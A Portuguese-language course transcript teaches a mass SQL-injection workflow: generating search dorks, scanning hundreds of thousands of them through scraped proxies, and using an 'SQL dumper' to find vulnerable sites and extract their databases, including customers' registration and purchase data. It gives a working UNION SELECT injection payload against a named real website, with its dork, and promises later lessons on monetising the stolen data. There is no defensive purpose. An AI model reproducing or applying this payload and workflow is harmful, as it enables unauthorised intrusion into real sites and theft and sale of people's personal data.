Transcrição Do Curso
Transcrição Do Curso
Transcrição Do Curso
Mão na massa
Entenderam?
Essas palavras eu vou adicionando ali conforme vou lembrando
ou vendo nas URLS dos sites
Quanto + palavras + dorks boas vocês terão
Podem usar esse mesmo método que fiz agora
-------------------------------------
-------------------------------------
O QUE ESSE PROGRAMA FEZ?
-------------------------------------
Hora de usar o SCANNER DE DORKS
Vamos abrir as dorks para ver um exemplo manual do que o programa fará
Viram?
O programa vai procurar e separar esses links de forma muito rapida
Vamos abri-lo
Ele pode pesquisar em vários mecanismos de buscas diferentes. Repare!
Nós usaremos hoje sómente o Bing! Você pode explorar todos nas suas
experiencias! ;)
-------------------------------------
Esse programa precisa ser alimentado com as DORKS que geramos
E com proxys que no caso serão do tipo Http, então deixemos como está
286.440 dorks a serem escaneadas
Depois que eu der enter o programa vai rodar e vai gerar um arquivo
com as proxys dentro da pasta do programa PROXY SCRAPPER
ok?
===================================================
DORK e PROXY
Vamos tentar encontrar as palavras e dorks que fizemos aqui nessas url
Sacaram?
===================================================
O SQL dumper vai pegar essa lista de sites que vieram nas buscas
E primeiramente vai filtrar os que estão vulneraveis
e numa segunda etapa ele vai explorar essa falha acessando a db
ou seja, a base de dados do sites
Nessa base encontraremos os dados contidos no site
Isso inclui dados dos usuarios, dados que eles inserem na hora do
cadastro ou da compra feita no site
OK?
Um macete que estou explorando e vou passar como extra pra vocês!
http://www.rioecultura.com.br/rioecultura/instituicao/instituicao.asp?
local_cod=234999999.9' union all select 1,
[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
and '0'='0
dork: instituicao.asp?local_cod=
Sacaram?
Vamos desenrolando esse extra pelo telegram.
5 (Extra) Como conseguir proxys para usar nos programas que pedem
VOU DEIXAR ESSE ARQUIVO PRA VOCES acompanharem por aqui também
Até logo
Nos próximos modulos eu ensino como testar esses dados e encontrar formas
de monetiza-los, ou seja, como fazer dinheiro com eles.
Dados = $$$$$$$$